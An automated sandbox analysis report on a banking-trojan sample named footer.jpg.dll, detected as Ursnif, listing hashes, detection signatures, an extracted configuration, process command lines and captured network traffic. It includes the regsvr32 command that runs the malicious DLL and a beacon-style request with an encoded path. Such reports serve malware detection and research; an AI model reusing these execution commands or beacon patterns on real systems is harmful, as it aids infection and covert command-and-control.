Play interactive tour

Edit tour

Analysis Report footer.jpg.dll

Overview

General Information

Sample Name:	footer.jpg.dll
Analysis ID:	350960
MD5:	9df5fcca1aadec6333301aca7a13c481
SHA1:	f3445c636e0a702eff7782b9e8eeb4ca84f842ff
SHA256:	8df914f790a6e5eb07042cce36ea9a23e23cdc1610d930f306f9ef55b6d8a2c5
Tags:	dllgoziisfbmiseursnif
Most interesting Screenshot:

Detection

Ursnif

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6024 cmdline: loaddll32.exe 'C:\Users\user\Desktop\footer.jpg.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)

regsvr32.exe (PID: 4164 cmdline: regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 6808 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4984 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 768 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4928 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@045012ceL", "dns": "045012", "version": "250177", "uptime": "363", "crc": "1", "id": "7251", "user": "4229768108f8d2d8cdc8873a86c00093", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 4164	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.4164.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@045012ceL", "dns": "045012", "version": "250177", "uptime": "363", "crc": "1", "id": "7251", "user": "4229768108f8d2d8cdc8873a86c00093", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: footer.jpg.dll

ReversingLabs: Detection: 12%

Machine Learning detection for sample

Show sources

Source: footer.jpg.dll

Joe Sandbox ML: detected

Source: 1.2.regsvr32.exe.400000.0.unpack

Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files

Show sources

Source: footer.jpg.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49771 version: TLS 1.2

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04877AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

Networking:

Source: Joe Sandbox View	IP Address: 104.20.185.68 104.20.185.68
Source: Joe Sandbox View	IP Address: 143.204.15.36 143.204.15.36
Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic

HTTP traffic detected: GET /images/6dayin3l_2BW7S5N/Gnz0LZyN5g7qBCp/B248LI31NTm818fYOn/fysFBCtAX/mFx67NJKGVDz3pFMjIdO/XoUT0M9jZwrwMgD0uAp/CgYK6Ygv23owJGncqjZFiC/pOwFjCE84YiD0/1phiKHMB/f6QyQEHF3TG2tTdcJHXtR52/qEFsUyav_2/BP9zanZDbdL9eB1Zb/YFBtE8bSAfxP/4sQIJiENwsY/qwZf6.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: footer.jpg.dll	String found in binary or memory: http://www.symantec.com
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&bhid=60140e93c5b18a0414cccba8&a
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1612940399&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1612940399&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1612940400&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1612940399&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dy5jJ.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpz
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/attacke-am-stadelhofen-sorgt-f%c3%bcr-etliche-hasskommentare/ar
